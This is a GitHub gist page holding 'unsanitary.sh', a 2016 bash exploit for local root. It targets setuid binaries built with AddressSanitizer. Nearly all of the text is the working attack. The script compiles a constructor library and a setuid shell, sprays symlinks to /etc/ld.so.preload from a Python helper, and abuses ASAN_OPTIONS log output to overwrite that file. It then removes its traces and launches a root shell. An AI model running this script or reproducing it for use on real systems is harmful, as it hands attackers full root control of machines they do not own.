-
-
Save KbaHaxor/161625ef328ee6e48621acf4d5509213 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # unsanitary.sh - ASAN/SUID Local Root Exploit | |
| # Exploits er, unsanitized env var passing in ASAN | |
| # which leads to file clobbering as root when executing | |
| # setuid root binaries compiled with ASAN. | |
| # Uses an overwrite of /etc/ld.so.preload to get root on | |
| # a vulnerable system. Supply your own target binary to | |
| # use for exploitation. | |
| # Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363 | |
| # Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk | |
| # Released under the Snitches Get Stitches Public Licence. | |
| # Gr33tz to everyone in #lizardhq and elsewhere <3 | |
| # ~infodox (18/02/2016) | |
| # FREE LAURI LOVE! | |
| echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)" | |
| if [[ $# -eq 0 ]] ; then | |
| echo "use: $0 /full/path/to/targetbin" | |
| echo "where targetbin is setuid root and compiled w/ ASAN" | |
| exit 0 | |
| fi | |
| echo "[+] First, we create our shell and library..." | |
| cat << EOF > /tmp/libhax.c | |
| #include <stdio.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| __attribute__ ((__constructor__)) | |
| void dropshell(void){ | |
| chown("/tmp/rootshell", 0, 0); | |
| chmod("/tmp/rootshell", 04755); | |
| unlink("/etc/ld.so.preload"); | |
| printf("[+] done!\n"); | |
| } | |
| EOF | |
| gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c | |
| rm -f /tmp/libhax.c | |
| cat << EOF > /tmp/rootshell.c | |
| #include <stdio.h> | |
| int main(void){ | |
| setuid(0); | |
| setgid(0); | |
| seteuid(0); | |
| setegid(0); | |
| execvp("/bin/sh", NULL, NULL); | |
| } | |
| EOF | |
| gcc -o /tmp/rootshell /tmp/rootshell.c | |
| rm -f /tmp/rootshell.c | |
| echo "[+] Now we drop our python symlink spraying tool..." | |
| cat << EOF > sym.py | |
| #!/usr/bin/python | |
| import os | |
| curpid=os.getpid() | |
| print curpid | |
| for x in range(0,100): | |
| newpid=curpid+x | |
| boom = "foo.%s" %(str(newpid)) | |
| os.symlink("/etc/ld.so.preload", boom) | |
| EOF | |
| echo "[+] Spraying dir with symlinks..." | |
| python sym.py | |
| echo "[+] Hack the planet!" | |
| ASAN_OPTIONS='suppressions="/hacktheplanet | |
| /tmp/libhax.so | |
| hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1 | |
| $1 >/dev/null 2>&1 | |
| echo "[+] Tidy up a bit..." | |
| rm -f foo* | |
| rm -f sym.py | |
| rm -f /tmp/libhax.so | |
| echo "[<3] :PPpPpPpOpr000000t!" | |
| /tmp/rootshell |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment